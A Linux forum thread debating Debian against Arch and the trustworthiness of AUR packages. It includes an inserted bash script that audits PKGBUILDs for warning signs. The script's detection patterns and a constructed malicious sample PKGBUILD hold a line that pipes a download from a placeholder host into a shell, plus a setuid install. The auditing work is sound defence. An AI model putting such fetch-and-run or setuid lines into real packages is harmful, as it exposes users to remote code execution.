this post was submitted on 28 Feb 2024
-28 points (36.0% liked)

Linux



So the thing with Debian and any Debian-based distro like Ubuntu or Linux Mint is that there is no big centralized software repo like the AUR. Yes, there is the apt repository, but if you want something that's not in there, get ready to read the documentation or follow random guides.

For example, one of my friends wanted to download an audio tool called Reaper. On Windows this is just looking up the application and clicking on the .exe. It really depends on the dev whether they include a .deb; sometimes you might need to download the .sh file, or they may tell you to compile it yourself. Perhaps you have to add a PPA. On Arch, all I have to do is paru -S Reaper; if there are multiple Reapers I can look for that by typing paru Reaper.

Now that Arch is so easy to install with the Archscript, and the software repo is so vast and easy to use, is Debian really user-friendly if you have to jump through several hoops to download programs?

Edit: yeah, yeah, there's Flathub and stuff, but that's more of a last resort; optimally, you want to get it the correct way.

[–] constantokra@lemmy.one 11 points 8 months ago (3 children)

Do you look at the stuff in the AUR? Because any of that stuff you install from there could be messed with, because it's a user repository. I specifically left Arch because I had to look into all the packages I installed from the AUR, and the stuff from the official repos was pretty limited compared to something like Debian. That took a lot of time. Or, you could always just install whatever you find with zero concern about security.

I've been running Debian for decades with maybe 2 problems I had to manually resolve with apt. I ran Arch and Manjaro for maybe a year, and had a handful. I'm certainly not going to say not to run Arch, but it's in no way easier to keep running than Debian. That's literally Debian's whole gig.

[–] yianiris@kafeneio.social 2 points 8 months ago (1 children)

In all the years I've used the AUR I only heard of one pkg violating security; it was recognized pretty fast and was removed within hours of going up. AUR pkgs have history/tracking/votes on them; with thousands using them, it is just as likely for an official pkg to have rogue code as an AUR pkg.

Also, AUR pkgs are not really software written for the AUR; it is software packaged for the Arch ecosystem, and several other distros are using them.

@constantokra @pineapplelover

[–] constantokra@lemmy.one 4 points 8 months ago (2 children)

Right, and that's a good reason why you should feel reasonably comfortable installing very popular software from the AUR, once it's been there for a while. That's not why people like the AUR.

People like that you can get even unpopular stuff in the AUR, and that's the stuff you need to be suspicious of. If you're getting some niche Y2K-era packet radio software from the AUR, you should be checking how it's packaged and what is actually being packaged. And if you have the knowledge to do that, you might as well get the source and install it yourself. I'll admit that I'm getting old, and I don't know if that's something people aren't willing or able to do these days.

Maybe I'm just cranky about Arch, but it just seems really stupid to me to go through manually installing and setting up your system just to either install some random crap from the AUR, or have to manually review it all because the official repos are pretty bare.

[–] yianiris@kafeneio.social 0 points 8 months ago (1 children)

1. If you take an average AUR pkg and read its content (the PKGBUILD), the procedure of building an Arch-like pkg is not very much unlike the practice of building and installing from source as in the old days. The difference is that when a new revision, a needed patch, or a rebuild due to fresh libraries/dependencies is necessary, you will be notified through your AUR helper.

@constantokra

[–] constantokra@lemmy.one 2 points 8 months ago (1 children)

Yes. It is possible to verify what's going on. That's what I did when I used the AUR. Do you think most people do that, or even look to see how many users are using the software? Or do you imagine they just install it blindly?

If you ever see a help video or article that suggests installing something from source, or running some script, people generally tell the reader that they shouldn't just run random code without looking at it. I've never once seen anything that suggested people should check the PKGBUILD. I don't have a problem with the AUR. I just think it's not nearly as trustworthy as it's generally made out to be, and I don't think people generally understand that it might even be a concern, or that you can check the validity of the package yourself.
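The "check the PKGBUILD yourself" step the comment above refers to, as an added example that is not part of this thread and not an Arch or AUR tool. It assumes bash (or a POSIX sh) with GNU grep, the per-package git repository layout the AUR exposes (git clone https://aur.archlinux.org/<pkgname>.git), and two PKGBUILDs constructed for the demo; example.invalid is a reserved domain that never resolves. The checks are heuristics that point a reviewer at the lines worth reading (unverified sources, disabled checksums, downloads piped into a shell, setuid bits, root-run .install scriptlets, -bin repackaging); a clean result is not a verdict.

```bash
#!/usr/bin/env bash
# Added example, not an Arch/AUR tool: a pre-flight skim of a PKGBUILD before an
# AUR helper builds it. Heuristics only: they point at lines worth reading.
# Assumed real-world use:  git clone https://aur.archlinux.org/<pkgname>.git
#                          audit_pkgbuild <pkgname>/PKGBUILD   (then read it, and any .install file)

findings=0
flag() { printf 'WARN: %s\n' "$1"; findings=$((findings + 1)); }

# audit_pkgbuild <PKGBUILD>: prints warnings, returns the number of findings
# (0 means none of these patterns appeared, not that the package is safe).
audit_pkgbuild() {
  local f="$1"
  findings=0
  [ -r "$f" ] || { printf 'cannot read %s\n' "$f" >&2; return 99; }

  # Plain http/ftp sources can be swapped in transit; only the checksums protect you.
  grep -Eq '(ht|f)tp://' "$f" && flag "source or url fetched over plain http/ftp"

  # 'SKIP' turns off makepkg checksum verification. Normal for git sources, but then
  # a signature (validpgpkeys) or a pinned commit/tag is what to look for instead.
  if grep -Eq "'SKIP'" "$f" && ! grep -Eq '^validpgpkeys=' "$f"; then
    flag "a checksum is 'SKIP' and no validpgpkeys= is declared"
  fi

  # Download piped into a shell: code that is not in the file you are reading.
  grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$f" \
    && flag "downloads piped straight into a shell"

  # Decoding or eval'ing strings at build time is how a payload hides from a skim.
  grep -Eq 'base64[[:space:]]+(-d|--decode)|(^|[^[:alnum:]_])eval[[:space:]]' "$f" \
    && flag "base64 decode or eval in the build"

  # setuid/setgid bits on installed files (chmod 4755, install -Dm4755, chmod u+s).
  grep -Eq 'chmod[[:space:]]+([ugoa]*\+[rwx]*s|[2-7][0-7]{3})|-[A-Za-z]*m[[:space:]]*[2-7][0-7]{3}' "$f" \
    && flag "installs a setuid/setgid file"

  # A package build has no business in your home directory or sudoers; it writes under $pkgdir.
  grep -Eq '\$HOME|~/\.|/etc/sudoers' "$f" && flag "references \$HOME, ~/.* or /etc/sudoers"

  # An .install scriptlet runs as root when pacman installs the package. Read it too.
  grep -Eq '^install=' "$f" && flag "ships a .install scriptlet (runs as root at install time)"

  # -bin packages repackage an upstream binary; the PKGBUILD cannot show what is in it.
  grep -Eq "^pkgname=.*-bin(['\"]|\$)" "$f" && flag "prebuilt binary; the source is not what gets installed"

  printf 'findings: %d\n' "$findings"
  return "$findings"
}

# Constructed sample with every red flag above (not a real package; example.invalid never resolves).
write_suspicious_sample() {
  cat > "$1" <<'EOF'
pkgname=example-tool-bin
pkgver=1.2.3
pkgrel=1
pkgdesc="Constructed package used only to exercise audit_pkgbuild"
arch=('x86_64')
url="http://example.invalid/tool"
install=example-tool.install
source=("http://example.invalid/tool-$pkgver.tar.gz")
sha256sums=('SKIP')

package() {
  curl -fsSL http://example.invalid/post-install.sh | sh
  install -Dm4755 "$srcdir/tool" "$pkgdir/usr/bin/tool"
}
EOF
}

# Constructed boring counterpart: https source, a (placeholder) digest, no scriptlet, normal modes.
write_clean_sample() {
  cat > "$1" <<'EOF'
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
pkgdesc="Constructed package used only to exercise audit_pkgbuild"
arch=('x86_64')
url="https://example.invalid/tool"
source=("https://example.invalid/tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

package() {
  install -Dm755 "$srcdir/tool-$pkgver/tool" "$pkgdir/usr/bin/tool"
}
EOF
}

# Demo: audit both samples; the return value is the finding count.
demo_dir=$(mktemp -d)
write_clean_sample "$demo_dir/clean";           audit_pkgbuild "$demo_dir/clean" || true
write_suspicious_sample "$demo_dir/suspicious"; audit_pkgbuild "$demo_dir/suspicious" || true
rm -rf "$demo_dir"
```

The clean sample returns 0 and the constructed bad one returns 6. A zero only means none of these patterns appeared: you still read package(), any .install file, and the package's history (git log -p in the cloned AUR directory shows every change a maintainer pushed), and you run the audit on the exact checkout your helper is about to build, not on a copy viewed in a browser.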

[–] yianiris@kafeneio.social 2 points 8 months ago

One out of five pkgs in the AUR is so unmaintained it doesn't even build anymore.

Cleaning up junk is more urgent than screening what comes on.
@constantokra

[–] yianiris@kafeneio.social 0 points 8 months ago (1 children)

2. Do you honestly think one can just make a fake account up, register, and publish an AUR pkg with rogue code that easily? There are checks on code, whether it is safe or not, whether it is asking for rights elevation, altering the filesystem's rights, etc.
You are making it sound like registering for X and publishing a tweet.

3. The most dangerous software I see on the AUR is browser bins by the BIG NAMES, not the little script stuff.
People are afraid of people instead of large corps.
@constantokra

[–] constantokra@lemmy.one 4 points 8 months ago

I think people can hide lots of things in code, especially when people don't generally look at it. And I know people don't look at it when they talk about how convenient the AUR is. It's at best marginally more convenient than installing from source.

I'm not at all suggesting that people should place more trust in large companies. I'm suggesting that packages in the AUR with lots and lots of users should be trusted more, specifically because some of them will be checking out the PKGBUILD, and the source, and presumably some of them would notice if the software did something it wasn't supposed to do. Obviously the larger the software the harder that all is to check, and correspondingly you'd want to see many more users using it before you'd extend it any trust.

My point being, I've not seen these discussions taking place. Maybe I've just missed them. But I feel like it's appropriate to bring it up when I see people talking about just how convenient the AUR is. It's really not that convenient if you're using it in a way that I'd consider reasonable.

[–] Aatube@kbin.social 1 points 8 months ago

I think that's a Manjarno problem.

[–] pineapplelover@lemm.ee 1 points 8 months ago (2 children)

When you download new programs how do you do so? You just install flatpak or what?

[–] Aatube@kbin.social 4 points 8 months ago

New packages on Flathub are moderated, though I haven't encountered any problems from the AUR's moderation model either, other than it sometimes being slow; harmful stuff is removed pretty fast.

[–] constantokra@lemmy.one 3 points 8 months ago

Ordinarily I use apt. Sometimes a flatpak if I trust the source. Otherwise it's from source, or usually something I'm running in Docker, where I'll check what it's actually doing if I'm at all suspicious.

I don't want to make too big a deal of the AUR. When I was using Arch and I needed something from the AUR it was easy enough to see that it was a legitimately packaged piece of software. The only big deal is that it's a real pain in the ass, and I know most people aren't doing that, and I never see anyone mention it, so I doubt people even consider that it could be an issue.

It comes down to what you trust. I trust the stuff I can get from Debian's repos. I trust some other sources, and everything else I look at. I don't trust the AUR, and I sincerely doubt most people look at the software they're installing from it to make sure it's legit.

It's really none of my business what others are comfortable with. The trustworthiness of where you get your software is a decision you have to make for yourself, and with the way people go on about the AUR I get the feeling they don't bother to decide. I don't ever hear anyone acknowledge that there's any sort of difference between the AUR and Debian's repos, but that's just frankly an utterly absurd idea.